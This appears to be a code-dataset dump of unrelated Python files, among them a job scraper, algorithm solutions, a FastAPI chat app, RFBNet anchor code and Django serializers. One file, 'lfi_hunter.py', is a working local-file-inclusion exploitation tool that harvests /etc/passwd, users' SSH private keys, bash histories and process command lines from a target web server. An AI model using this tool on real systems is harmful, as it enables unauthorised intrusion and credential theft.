selector\n \n def iter_each_job(Jobs):\n '''\n This function take all 30 jobs in the page and loop\n for each one of them to extract more info about each job\n like job_description , salray , about the company and more\n finaly store the result in the genrator to loop on it in another time\n '''\n for i in range(len(Jobs)):\n page.locator(\"li[class*='react-job-listing']\").all()[i].click()\n page.wait_for_timeout(2000)# Wait for several milliseconds\n if page.locator(\"div[class*='actionBar'] > button\").count() == 1:# Check if there is register page\n page.locator(\"div[class*='actionBar'] > button\").click() # Close the register page\n page.wait_for_selector(\"article[class*='scrollable active']\") # Wait untile the selector load\n page.get_by_text('Show More').first.click() # Show job description\n page.wait_for_timeout(200)# Wait for several milliseconds\n yield page.inner_html('body') \n else: \n page.wait_for_selector(\"article[class*='scrollable active']\") # Wait untile the selector load\n page.get_by_text('Show More').first.click() # Show job description\n page.wait_for_timeout(200)# Wait for several milliseconds\n yield page.inner_html('body')\n\n\n # html_bodies = iter_each_job(page.locator(\"li[class*='react-job-listing']\").all()) \n\n def scrape_data(body):\n '''\n This function works to store the data in json list of dict\n first loop over all right continer jobs in the page to\n just get the job title , company title ,location and date posted\n from the main body of html\n '''\n \n html = HTMLParser(body) # parse the the body of html page to dealing with it using css selector\n df=[{\n 'Job_Title':title.text(),#Extract the Job Title\n 'Company_Title':re.sub(r'[^A-z]',' ',company.text()).strip(), # Substract all anything except string than get the string\n 'Location':location.text(),#Extract the Location of the company\n 'Date_Posted':dt.strftime(dt.now() - pd.Timedelta(value= int(re.findall(r'\\d',date_posted.text())[0]), unit='D'),'%Y-%m-%d') if re.findall(r'[A-z]',date_posted.text())[0].lower() != 'h' else dt.strftime(dt.now(),'%Y-%m-%d'),\n } # if the date posted is 24h i'll return the today's day in date formating else the date posted like 5d i'll substract 5 days from today's date and return it in formating date \n for title ,company ,location, date_posted in zip(html.css(\"div [class*='job-title']\"),html.css(\"div [id*=job-employer]\"),html.css(\"div[class*='location mt-xxsm']\"),html.css(\"div [data-test='job-age']\"))] \n \n # Loop for each job to get the job describtion and more info about the company\n df_desc = []\n for job in iter_each_job(page.locator(\"li[class*='react-job-listing']\").all()):\n html_desc = HTMLParser(job) # parse the first html of the job desc\n if len(html_desc.css(\"#CompanyContainer\")) != 0 : # Check if there is a comany over view container\n company_over_view = {company_overview_matric.text().lower():company_overview_value.text().lower() for company_overview_matric,company_overview_value in zip(html_desc.css(\"#CompanyContainer div span[class*='1taruhi']\"),html_desc.css(\"#CompanyContainer div span[class*='i9gxme']\"))} \n df_desc.append(# First, I have to iterate on the key and the value for each container I did a dictionary because there are some jobs that have incomplete information and without order\n {'Size' : company_over_view['size'] if 'size' in company_over_view.keys() else np.NaN,\n 'Founded' : int(company_over_view['founded']) if 'founded' in company_over_view.keys() else np.NaN,\n 'Type' : company_over_view['type'] if 'type' in company_over_view.keys() else np.NaN,\n 'Industry' : company_over_view['industry'] if 'industry' in company_over_view.keys() else np.NaN,\n 'Sector' : company_over_view['sector'] if 'sector' in company_over_view.keys() else np.NaN,\n 'Revenue' : company_over_view['revenue'] if 'revenue' in company_over_view.keys() else np.NaN,\n 'Average_Salary':page.locator(\"div [class*='7rpujz']\").inner_text() if len(html_desc.css(\"div [class*='salaryTab']\")) != 0 else np.NaN,\n 'Estimate_Salary':page.locator(\"div [class*='1d4p0fd']\").first.inner_text() +\" to \"+ page.locator(\"div [class*='1d4p0fd']\").last.inner_text() if len(html_desc.css(\"div [class*='salaryTab']\")) != 0 else np.NaN,\n 'Job_Description': page.locator(\"div [class*='jobDescriptionContent']\").inner_text() if len(html_desc.css(\"div [class*='jobDescriptionContent']\")) != 0 else np.NaN}\n )\n else: # If the comany over view container fill all the data with null values\n df_desc.append(\n {'Size' : np.NaN,\n 'Founded' : np.NaN,\n 'Type' : np.NaN,\n 'Industry' : np.NaN,\n 'Sector' : np.NaN,\n 'Revenue' : np.NaN,\n 'Average_Salary':page.locator(\"div [class*='7rpujz']\").inner_text() if len(html_desc.css(\"div [class*='salaryTab']\")) != 0 else np.NaN,\n 'Estimate_Salary':page.locator(\"div [class*='1d4p0fd']\").first.inner_text() +\" to \"+ page.locator(\"div [class*='1d4p0fd']\").last.inner_text() if len(html_desc.css(\"div [class*='salaryTab']\")) != 0 else np.NaN,\n 'Job_Description': page.locator(\"div [class*='jobDescriptionContent']\").inner_text() if len(html_desc.css(\"div [class*='jobDescriptionContent']\")) != 0 else np.NaN}\n )\n\n # #Update the dictionaries with each other\n for z , zz in zip(df , df_desc):\n z.update(zz)\n Data_Frame = df\n \n\n return Data_Frame\n \n\n def Create_newfile(your_filename):\n # Check If the file is exists if not create new one\n '''\n This function take your file name to create a new file if\n the file dosen't exists and if not remove the exists file\n which's contains the old data and create new one that \n will has the new data in it\n '''\n if os.path.exists(your_filename) :\n os.remove(your_filename)\n open(your_filename,'w').close()\n else:\n open(your_filename,'w').close()\n\n Create_newfile('Glassdoor.json')\n \n\n # Write data into json file\n def write_json(data , filename):\n '''\n This function takes the data that you wanna write\n and the file name and it'll automatice write the data\n and close the file \n '''\n with open(filename , 'w') as file: \n json.dump(data , file,indent=4)\n file.close()\n\n def append_new_data(new_data , filename):\n '''\n this function takes the new data that you wanna append to\n the json file and the file name and\n '''\n # first read the json file to load the old data\n with open(filename,'r') as file:\n old_data = json.load(file)\n for data in new_data:\n old_data.append(data) # loop through list of dict to append each dict \n all_data = old_data\n write_json(all_data,filename)# now update the json file by writing all data \n file.close()\n \n\n num_pages = int(page.locator(\"div[class='paginationFooter']\").inner_text().split(' ')[-1]) # Extract the number of pages \n counter = 0\n while counter < num_pages: # Loop for number of pages \n \n if page.locator(\"div[class*='actionBar'] > button\").count() == 1: # Check if there is register page\n page.locator(\"div[class*='actionBar'] > button\").click() # Close the register page\n\n # else: # there is no register page\n data = scrape_data(page.inner_html('body')) # Extract the body of the page\n\n # Store The Data in json file\n #Using try and except to avoid the error which will happen because the empty file\n try:\n append_new_data(data , 'Glassdoor.json')#Second, the function will append the new data, and the first time the file will be empty of course I got an error so I should use the write function first to write the data\n except: \n write_json(data , 'Glassdoor.json')#Third for only the first time I gonna use the right function directly but then I gonna use it from the append function to write the new data \n\n if counter > 0 and page.locator('button[disabled]').count() == 1:# th break the last page\n break\n\n page.get_by_role('button',name='Next').click() # Move to the next page\n page.wait_for_selector(\"li[class*='react-job-listing']\") # Wait untile the selector load\n \n page.wait_for_timeout(3000) # # Wait for several milliseconds \n \n counter += 1\n\n page.close()\n \n\n","repo_name":"bhr100/Data-Analyst-Jobs","sub_path":"Jobs-Scraper.py","file_name":"Jobs-Scraper.py","file_ext":"py","file_size_in_byte":11342,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"70341084204","text":"from collections import defaultdict\n\n\nclass UndergroundSystem:\n\n def __init__(self):\n self.journey = defaultdict()\n self.history = defaultdict()\n \n def checkIn(self, id: int, startStation: str, t: int) -> None:\n self.journey[id] = (startStation, t)\n \n\n def checkOut(self, id: int, endStation: str, endTime: int) -> None:\n startStation, startTime = self.journey.pop(id)\n key = (startStation, endStation)\n allTime, allCount = self.history.get(key, (0, 0))\n self.history[key] = (allTime + (endTime - startTime), allCount + 1)\n \n def getAverageTime(self, startStation: str, endStation: str) -> float:\n key = (startStation, endStation)\n allTime, allCount = self.history.get(key, (0, 0))\n return allTime / allCount\n\n\n# Your UndergroundSystem object will be instantiated and called as such:\nobj = UndergroundSystem()\nobj.checkIn(1, \"dhaka\", 23)\nobj.checkOut(1, \"kishoreganj\", 30)\nt = obj.getAverageTime(\"dhaka\", \"kishoreganj\")\nprint(t)","repo_name":"fkshohag/All-algorithm","sub_path":"Online-judge/leetcode/design-underground-system.py","file_name":"design-underground-system.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"27402002697","text":"import moviepy.editor as mpy\nimport gizeh as gz\n\nVIDEO_SIZE = (1920, 1080)\nWHITE = (255, 255, 255)\nDURATION = 5\nKIDS_PIC = \"./assets/cyberscooty-two-kids.png\"\nTEACHER_PIC = \"./assets/teacher.png\"\n\nif __name__ == '__main__':\n kids_pic = mpy.ImageClip(KIDS_PIC). \\\n set_position((15,900)).resize(width=200)\n\n teacher_pic = mpy.ImageClip(KIDS_PIC). \\\n set_position((1900,900)).resize(width=200)\n\n video = mpy.CompositeVideoClip(\n [\n kids_pic,\n teacher_pic\n ],\n size=VIDEO_SIZE).\\\n on_color(\n color=WHITE,\n col_opacity=1).set_duration(DURATION)\n\n video.write_videofile('sample.mp4', fps=10)\n","repo_name":"nishantnischaya/YoutubeAutogenerated","sub_path":"test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"35501826900","text":"from sympy import symbols, diff, Function, pi, dsolve, solve, integrate\n\nheight = 30e-2\nd_1 = 8.2e-2\nd_2 = 13e-2\nt_1 = 20\nt_2 = 520\nlambda_ = 100\n\nA = Function('A')\nt = symbols('t')\nPhi = symbols('Phi')\ny = symbols('y')\n\neq1 = diff(A(y), y, 2)\nA = solve(dsolve(eq1, ics={A(0): pi/4*d_2**2, A(height): pi/4*d_1**2}), A(y))[0]\n# Phi = -lambda_*A*diff(t, y)\nresult1 = integrate(-1/(lambda_ * A), (y, 0, height))\nresult2 = integrate(1, (t, t_2, t_1))\nPhi = result2 / result1\nprint(f'Phi = {Phi:.2f} W')\n","repo_name":"hustquick/HeatTransfer","sub_path":"Problems/pr02-30.py","file_name":"pr02-30.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"22630954220","text":"# Written by Arno Bakker \n# see LICENSE.txt for license information\n\nfrom threading import currentThread\n\nfrom Tribler.Core.API import *\nfrom Tribler.Video.VideoServer import VideoHTTPServer\n\n\ndef state_callback(d,ds):\n print >>sys.stderr,\"main: Stats\",dlstatus_strings[ds.get_status()],ds.get_progress(),\"%\",ds.get_error()\n\ndef vod_ready_callback(d,event,params):\n print >>sys.stderr,\"main: VOD ready callback called\",currentThread().getName(),\"###########################################################\",params[\"mimetype\"]\n\n \"\"\"\n f = open(\"video.avi\",\"wb\")\n while True:\n data = stream.read()\n print >>sys.stderr,\"main: VOD ready callback: reading\",type(data)\n print >>sys.stderr,\"main: VOD ready callback: reading\",len(data)\n if len(data) == 0:\n break\n f.write(data)\n f.close()\n stream.close()\n \"\"\"\n\n videoserv = VideoHTTPServer.getInstance()\n videoserv.set_inputstream('video/mpeg',params[\"stream\"],None)\n \n\nif __name__ == \"__main__\":\n \n videoserv = VideoHTTPServer.getInstance() # create\n videoserv.background_serve()\n \n s = Session()\n \n if sys.platform == 'win32':\n tdef = TorrentDef.load('bla.torrent')\n else:\n tdef = TorrentDef.load('/tmp/bla.torrent')\n dcfg = DownloadStartupConfig.get_copy_of_default()\n #dcfg.set_saveas('/arno')\n dcfg = DownloadStartupConfig.get_copy_of_default()\n dcfg.set_video_start_callback(vod_ready_callback)\n #dcfg.set_selected_files('MATRIX-XP_engl_L.avi') # play this video\n #dcfg.set_selected_files('field-trip-west-siberia.avi')\n \n d = s.start_download(tdef,dcfg)\n d.set_state_callback(state_callback,1)\n #d.set_max_upload(100)\n \n time.sleep(10)\n \n \"\"\" \n d.stop()\n print \"After stop\"\n time.sleep(5)\n d.restart()\n \"\"\"\n time.sleep(2500)\n \n","repo_name":"csko/Tribler-gossip","sub_path":"Tribler/Test/API/test_vod.py","file_name":"test_vod.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"19"} +{"seq_id":"32934264937","text":"from typing import List\n\nimport uvicorn\nfrom fastapi import Depends\nfrom starlette.concurrency import run_until_first_complete\nfrom starlette.websockets import WebSocket\n\nfrom app import app, broadcast\nfrom auth import get_user_from_token\nfrom dependencies import get_user_repository, get_rooms_repo\nfrom schema import RoomDTO\n\n\n@app.get(\"/api/rooms\", response_model=List[RoomDTO])\nasync def get_rooms(\n user=Depends(get_user_from_token),\n rooms_repository=Depends(get_rooms_repo),\n repository=Depends(get_user_repository)\n):\n user = repository.get_by_login(login=user)\n if not user:\n raise Exception()\n return await rooms_repository.get_all()\n\n\nasync def events_ws_receiver(websocket, channel: str):\n async for message in websocket.iter_text():\n await broadcast.publish(channel=channel, message=message)\n\n\nasync def events_ws_sender(websocket, channel: str):\n async with broadcast.subscribe(channel=channel) as subscriber:\n async for event in subscriber:\n await websocket.send_text(event.message)\n\n\n@app.websocket(\"/{channel_id}\")\nasync def websocket_endpoint(websocket: WebSocket, channel_id: str):\n await websocket.accept()\n await run_until_first_complete(\n (events_ws_receiver, {\"websocket\": websocket, \"channel\": channel_id}),\n (events_ws_sender, {\"websocket\": websocket, \"channel\": channel_id}),\n )\n\n\nif __name__ == \"__main__\":\n uvicorn.run(app, host=\"0.0.0.0\", port=8000)\n","repo_name":"StephanYorchenko/health-manager-back","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"71283613165","text":"#%%\ndef openInput():\n with open('input.txt') as f:\n return f.read()\n\nclass House():\n def __init__(self, x, y) -> None:\n self.x = x\n self.y = y\n self.gifts = 0\n \n def addGift(self):\n self.gifts += 1\n\nclass Houses():\n def __init__(self) -> None:\n self.houses: list[House] = []\n\n def addHouse(self, house: House):\n self.houses.append(house)\n\n def getHouse(self, x, y) -> bool:\n for house in self.houses:\n if house.x == x and house.y == y:\n return house\n new_house = House(x,y)\n self.houses.append(new_house)\n return new_house\n\ndef move(x, y, cmd):\n if cmd == '<':\n x -= 1\n elif cmd == '>':\n x += 1\n elif cmd == '^':\n y += 1\n elif cmd == 'v':\n y -= 1\n return x, y\n\n\nline = openInput()\nhouses = Houses()\n\n# first house\nx, y = 0, 0\nhouse = houses.getHouse(x,y)\nhouse.addGift()\n\n# the rest\nfor cmd in line:\n x, y = move(x, y, cmd)\n house = houses.getHouse(x,y)\n house.addGift()\n # print(f'added gift at {x=}, {y=}')\n\nprint(len(houses.houses))\n\n# %%\n","repo_name":"jrkell/advent-of-code","sub_path":"2015/day-3/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"12313997145","text":"import torch\nimport torch.nn as nn\nimport torch.backends.cudnn as cudnn\nfrom math import sqrt as sqrt\nfrom itertools import product as product\n\n\nclass PriorBox(object):\n \"\"\"Compute priorbox coordinates in center-offset form for each source\n feature map.生成feature map上预定义的anchor box\n Note:\n This 'layer' has changed between versions of the original SSD\n paper, so we include both versions, but note v2 is the most tested and most\n recent version of the paper.\n\n \"\"\"\n def __init__(self, cfg):\n super(PriorBox, self).__init__()\n self.image_size = cfg['min_dim'] # 输入RFBNet的图像尺度,这里假设512\n # number of priors for feature map location (300有6个,而512有7个feature map)\n self.num_priors = len(cfg['aspect_ratios']) # 各个feature map上预定义的anchor长宽比清单,与检测分支的数量对应\n self.variance = cfg['variance'] or [0.1]\n self.feature_maps = cfg['feature_maps'] # 特征金字塔层上各个feature map尺度\n self.min_sizes = cfg['min_sizes'] # 预定义的anchor尺度���短边,越深层感受野越大故分配的anchor尺度越大\n # SSD中6个default bbox如何定义的?2:1 + 1:2 + 1:3 + 3:1+两个1:1长宽比的anchor,\n # 但SSD定义了一个根号2尺度的anchor,max_sizes类似,但并不是严格对应的\n self.max_sizes = cfg['max_sizes'] # 预定义的anchor尺度的长边\n self.steps = cfg['steps'] # 每个尺度检测特征图分支的stride(即与输入的缩小倍数)\n self.aspect_ratios = cfg['aspect_ratios'] # feature map上每个pix上预定义6/7个anchor\n self.clip = cfg['clip'] # 位置校验\n for v in self.variance:\n if v <= 0:\n raise ValueError('Variances must be greater than 0')\n\n def forward(self):\n mean = [] # 用于保存所有feature map上预定义的anchor\n for k, f in enumerate(self.feature_maps): #对特征金字塔的各个检测分支,每个feature map上each-pixel都做密集anchor采样\n for i, j in product(range(f), repeat=2): # 笛卡尔积repeat后的f,组成很多二维元组,可以开始密集anchor采样了\n f_k = self.image_size / self.steps[k] #当前检测分支的特征图大小\n cx = (j + 0.5) / f_k #当前检测分支的归一化后的anchor中心坐标cx\n cy = (i + 0.5) / f_k # 以上三步操作,就相当于从feature map位置映射至归一化原图,float型\n\n\n s_k = self.min_sizes[k]/self.image_size #归一化后的当前检测分支对应的anchor的min_size\n mean += [cx, cy, s_k, s_k] # 第一个anchor添加,1:1长宽比\n\n # aspect_ratio: 1\n # rel size: sqrt(s_k * s_(k+1))\n s_k_prime = sqrt(s_k * (self.max_sizes[k]/self.image_size)) #sqrt(min_sizes[k]*max_sizes[k]/(512*512))\n mean += [cx, cy, s_k_prime, s_k_prime]# 第二个anchor添加,1:1长宽比,尺度与第一个anchor不一样,和SSD对应上了~~~\n\n # rest of aspect ratios\n for ar in self.aspect_ratios[k]:#不管是[2]还是[2,3]都循环当前aspect_ratio内部元素\n mean += [cx, cy, s_k*sqrt(ar), s_k/sqrt(ar)]# 如是[2,3],生成2:1和3:1的anchor,如是[2]则生成2:1的anchor\n mean += [cx, cy, s_k/sqrt(ar), s_k*sqrt(ar)]# 如是[2,3],生成1:2和1:3,如是[2],生成1:2的anchor\n\n # 总结:\n # 1 每个检测分支feature map上each-pixel对应6 / 7个anchor,长宽比:2:1 + 1:2 + 1:3 + 3:1 + 1:1 + 1:1,后两个1:1的anchor对应的尺度有差异;\n # 2 跟SSD还是严格对应的,每个feature map上anchor尺度唯一(2:1 + 1:2 + 1:3 + 3:1 + 1:1这五个anchor的尺度还是相等的,面积相等),仅最后的1:1 anchor尺度大一点;\n # 3 所有feature map上所有预定义的不同尺度、长宽比的anchor保存至mean中;\n\n # back to torch land\n output = torch.Tensor(mean).view(-1, 4) # 操作类似reshape,规则化输出\n if self.clip:\n output.clamp_(max=1, min=0)# float型坐标校验\n return output\n","repo_name":"2585157341/RFBNet-master_Chinese_note","sub_path":"layers/functions/prior_box.py","file_name":"prior_box.py","file_ext":"py","file_size_in_byte":4248,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"19"} +{"seq_id":"25409237424","text":"from multiprocessing import Pool\nimport requests\nimport argparse\nimport signal\nimport re\n\nclass LFI_Hunter():\n def __init__(self,url,file,lfi,pid,output_file,threads,header,cookie,user_agent,proxy):\n self.url = url\n self.file = file\n self.lfi = lfi\n self.pid = pid\n self.output_file = output_file\n self.check = self.size_check()\n self.threads = threads\n self.header = header\n self.cookie = cookie\n self.user_agent = user_agent\n self.proxy = proxy\n\n self.headers,self.proxy_set = self.create_headers()\n self.set_processes_wordlist()\n self.set_processes_procs()\n self.get_history()\n self.get_keys()\n\n def create_headers(self):\n headers = {\n \"Connection\":\"close\"\n }\n\n proxy_set = {}\n\n if args.a:\n headers[\"User-Agent\"] = self.user_agent\n\n if args.p:\n proxy_set = {\n \"http\": \"http://\" + self.proxy\n }\n \n if args.c:\n headers['Cookie'] = self.cookie\n\n if args.H:\n header_list = self.header.split(': ')\n list_length = len(header_list) - 1 \n for each_header in range(0,list_length):\n headers[header_list[each_header]] = header_list[each_header + 1]\n\n return headers,proxy_set\n \n def size_check(self):\n requests.packages.urllib3.disable_warnings()\n if args.o:\n file_write = open(self.output_file,\"w\")\n file_write.close()\n\n check = self.url + self.lfi + \"/9fX1SxbT61qUDQKjpDWo8ApV3YTVLpz5ThM3wJ6XOqlaz\"\n req_lfi = requests.get(check, allow_redirects = False, verify=False)\n page_size = len(req_lfi.text)\n\n return page_size\n\n def write_output(self,line1,line2,line3):\n print(line1)\n print(line2)\n print(line3)\n out_file = open(self.output_file,'a')\n out_file.write(line1)\n out_file.write(\"\\n\")\n out_file.write(line2)\n out_file.write(line3)\n out_file.write(\"\\n\")\n out_file.close()\n\n def get_keys(self):\n requests.packages.urllib3.disable_warnings()\n find_users = self.url + self.lfi + \"/etc/passwd\"\n req_lfi = requests.get(find_users, allow_redirects = False, verify=False)\n search = re.findall(\"/home/(.*):/bin/\",req_lfi.text)\n \n for each_user in search:\n print(\"Searching for SSH keys for user(s) \" + each_user)\n ssh_payload = self.url + self.lfi + \"/home/\" + each_user + \"/.ssh/id_rsa\"\n req_ssh = requests.get(ssh_payload, headers=self.headers, proxies=self.proxy_set, allow_redirects = False, verify=False)\n \n if len(req_ssh.text) > self.check:\n line1 = \"Found: \\x1b[6;30;42mSSH Keys for \" + each_user.strip() + \"\\x1b[0m\"\n line2 = \"\\n\" + req_ssh.text + \"\\n\"\n line3 = \"\\033[31m\" + \"*\" * 100 + \"\\x1b[0m\"\n \n if args.o:\n self.write_output(line1,line2,line3)\n else:\n print(line1)\n print(line2)\n print(line3)\n\n else:\n print(\"No SSH keys found for user(s) \" + each_user.strip())\n print(\"\\033[31m\" + \"*\" * 100 + \"\\x1b[0m\")\n\n def get_history(self):\n requests.packages.urllib3.disable_warnings()\n find_users = self.url + self.lfi + \"/etc/passwd\"\n req_lfi = requests.get(find_users, allow_redirects = False, verify=False)\n search = re.findall(\"/home/(.*):/bin/\",req_lfi.text)\n \n for each_user in search:\n print(\"Searching for history files for user(s) \" + each_user)\n ssh_payload = self.url + self.lfi + \"/home/\" + each_user + \"/.bash_history\"\n req_ssh = requests.get(ssh_payload, headers=self.headers, proxies=self.proxy_set, allow_redirects = False, verify=False)\n \n if len(req_ssh.text) > self.check:\n line1 = \"Found: \\x1b[6;30;42mHistory File for \" + each_user.strip() + \"\\x1b[0m\"\n line2 = \"\\n\" + req_ssh.text + \"\\n\"\n line3 = \"\\033[31m\" + \"*\" * 100 + \"\\x1b[0m\"\n \n if args.o:\n self.write_output(line1,line2,line3)\n else:\n print(line1)\n print(line2)\n print(line3)\n\n else:\n print(\"No history file found for user(s) \" + each_user.strip())\n print(\"\\033[31m\" + \"*\" * 100 + \"\\x1b[0m\")\n\n def set_processes_wordlist(self):\n original_sigint_handler = signal.signal(signal.SIGINT, signal.SIG_IGN)\n pool = Pool(processes=int(self.threads)) \n signal.signal(signal.SIGINT, original_sigint_handler)\n\n wordlist = []\n with open(self.file,'r') as wordlist_file: \n for each_word in wordlist_file: \n wordlist.append(each_word.rstrip())\n\n try:\n start = pool.map_async(self.lfihunt,wordlist)\n except KeyboardInterrupt:\n pool.terminate()\n else:\n pool.close()\n pool.join()\n\n def set_processes_procs(self):\n print(\"Searching for running processes in /proc/$(PID)/cmdline\")\n original_sigint_handler = signal.signal(signal.SIGINT, signal.SIG_IGN)\n pool = Pool(processes=int(self.threads)) \n signal.signal(signal.SIGINT, original_sigint_handler)\n\n wordlist = []\n for each_pid in range(0,int(self.pid)): \n wordlist.append(each_pid)\n\n try:\n start = pool.map_async(self.get_procs,wordlist)\n except KeyboardInterrupt:\n pool.terminate()\n else:\n pool.close()\n pool.join()\n\n def get_procs(self,each_pid):\n requests.packages.urllib3.disable_warnings()\n process = self.url + self.lfi + \"/proc/\" + str(each_pid) + \"/cmdline\"\n req_proc = requests.get(process, headers=self.headers, proxies=self.proxy_set, allow_redirects = False, verify=False)\n if len(req_proc.text) > self.check:\n line1 = \"Process: \\x1b[6;30;42m/proc/\" + str(each_pid) + \"/cmdline\\x1b[0m\"\n line2 = \"\\n\" + req_proc.text + \"\\n\"\n line3 = \"\\033[31m\" + \"*\" * 100 + \"\\x1b[0m\"\n if args.o:\n self.write_output(line1,line2,line3)\n else:\n print(line1)\n print(line2)\n print(line3)\n\n def lfihunt(self,each_line):\n requests.packages.urllib3.disable_warnings() \n req_lfi = requests.get(self.url + self.lfi + each_line, headers=self.headers, proxies=self.proxy_set, allow_redirects = False, verify=False)\n\n if len(req_lfi.text) > self.check:\n line1 = \"File: \\x1b[6;30;42m\" + each_line + \"\\x1b[0m\"\n line2 = \"\\n\" + req_lfi.text + \"\\n\"\n line3 = \"\\033[31m\" + \"*\" * 100 + \"\\x1b[0m\"\n if args.o:\n self.write_output(line1,line2,line3)\n else:\n print(line1)\n print(line2)\n print(line3)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='LFI Enumeration Tool')\n parser.add_argument('-u', metavar='', help='Example: -u http://lfi.location/?parameter=', required=True)\n parser.add_argument('-w', metavar='',help=\"Example: -w unix.txt\", required=True)\n parser.add_argument('-l', metavar='',help=\"Example: -l ../../../../../\", required=True)\n parser.add_argument('-pid', metavar='',default='1000',help=\"Default is 1000. Example: -pid 2000\", required=False)\n parser.add_argument('-o', metavar='',help=\"Example: -o output.txt\", required=False)\n parser.add_argument('-t', metavar='',default=\"10\",help=\"Example: -t 100. Default 10\", required=False)\n parser.add_argument('-H', metavar='
        ',help=\"Example -H 'Parameter: Value\", required=False)\n parser.add_argument('-c', metavar='',help=\"Example -c 'Cookie Value\", required=False)\n parser.add_argument('-a', metavar='',help=\"Example: -a Linux\", required=False)\n parser.add_argument('-p', metavar='',help=\"Example: -p 127.0.0.1:8080\", required=False)\n args = parser.parse_args()\n \n try:\n LFI_Hunter(args.u,args.w,args.l,args.pid,args.o,args.t,args.H,args.c,args.a,args.p)\n except KeyboardInterrupt:\n print(\"\\nBye Bye!\")\n exit()","repo_name":"hadrian3689/lfi_hunter","sub_path":"lfi_hunter.py","file_name":"lfi_hunter.py","file_ext":"py","file_size_in_byte":8546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"25435324945","text":"import requests\r\nimport zipfile\r\nimport pandas as pd\r\nimport io\r\n\r\n# repository_url = \"https://github.com/AustinWalsh/Datasets-COVID-19/archive/refs/heads/master.zip\"\r\n# csv_file_name = \"NYT-us-counties.csv\"\r\n\r\nrepository_url = input(\"Please enter the repository zip URL: \")\r\ncsv_file_name = input(\"Please enter the csv file name to search: \")\r\n\r\nzip_url = repository_url\r\n\r\ndef getRepoAndCSV():\r\n response = requests.get(zip_url)\r\n df = None\r\n if response.status_code == 200:\r\n with zipfile.ZipFile(io.BytesIO(response.content)) as zip_ref:\r\n for file_info in zip_ref.infolist():\r\n if csv_file_name in file_info.filename:\r\n with zip_ref.open(file_info) as csv_file:\r\n df = pd.read_csv(csv_file)\r\n break\r\n\r\n if df is not None:\r\n print(\"CSV loaded successfully...\")\r\n print(df)\r\n else:\r\n print(\"CSV could not be loaded\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print(\"Running script....\")\r\n getRepoAndCSV()","repo_name":"Harrylever/dataset-mining-python","sub_path":"main-2.py","file_name":"main-2.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"40514504613","text":"from rest_framework import serializers\nfrom rest_framework_simplejwt.serializers import TokenObtainPairSerializer\n\nfrom Auth.models import (\n User, \n Userprofile, \n AuthUser, \n Userjwttoken, \n Firebasetoken,\n Userauthlist\n )\n\nclass MyTokenObtainPairSerializer(TokenObtainPairSerializer):\n @classmethod\n def get_token(cls, user):\n token = super().get_token(user)\n\n # Add custom claims\n token['uuid'] = user.u_uuid.hex()\n #token['id'] = user.u_id\n #token['pw'] = user.u_pw\n return token\n\nclass UserSerializer(serializers.ModelSerializer):\n class Meta:\n model = User\n fields = [ \n 'u_uid',\n 'u_uuid',\n 'u_grade',\n 'u_id',\n 'u_pw',\n 'u_phone',\n 'u_sex',\n 'u_mainpic',\n 'u_point',\n 'u_emailnotify',\n 'u_smsnotify',\n 'u_pushnotify',\n 'u_registerdate',\n #'u_withdrawaldate',\n 'u_lastlogin',\n 'u_introcode',\n 'u_appversion']\n\nclass UserprofileSerializer(serializers.ModelSerializer):\n class Meta:\n model = Userprofile\n fields = [ \n 'up_useruuid',\n 'up_name',\n 'up_sex',\n 'up_birth',\n 'up_height',\n 'up_body',\n 'up_edu',\n 'up_eduname',\n 'up_live',\n 'up_religion',\n 'up_smoke',\n 'up_alcohol',\n 'up_nickname',\n 'up_selfintro',\n 'up_character',\n 'up_requirepic',\n 'up_extrapic'\n ]\n\nclass AuthUserSerializer(serializers.ModelSerializer):\n class Meta:\n model = AuthUser\n fields = [\n 'password',\n 'last_login',\n 'is_superuser',\n 'username',\n 'first_name',\n 'last_name',\n 'email',\n 'is_staff',\n 'is_active',\n 'date_joined'\n ]\n\nclass UserjwttokenSerializer(serializers.ModelSerializer):\n class Meta:\n model = Userjwttoken\n fields = [\n 'ujt_key',\n 'ujt_useruuid',\n ]\n\nclass FirebasetokenSerializer(serializers.ModelSerializer):\n class Meta:\n model = Firebasetoken\n fields = [ 'fbt_useruuid',\n 'fbt_usertoken',\n 'fbt_generdate']\n\nclass UserauthlistSerializer(serializers.ModelSerializer):\n class Meta:\n model = Userauthlist\n fields = [ 'ual_useruuid',\n 'ual_type',\n 'ual_require',\n 'ual_confirm',\n 'ual_return',\n 'ual_image'\n ]","repo_name":"strsu/Django_PartyApp","sub_path":"Auth/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73852790763","text":"import sys\ninput = sys.stdin.readline\n\nif __name__ == \"__main__\":\n num = int(input())\n count = 0\n for i in range(1, num+1):\n nums = list(map(int, str(i)))\n if i < 100:\n count += 1\n elif nums[0]-nums[1] == nums[1]-nums[2]:\n count += 1\n print(count)","repo_name":"HyunwooKoh/CodingTest","sub_path":"baekjoon/silver4/sol_1065.py","file_name":"sol_1065.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"12296563328","text":"# -*- coding: 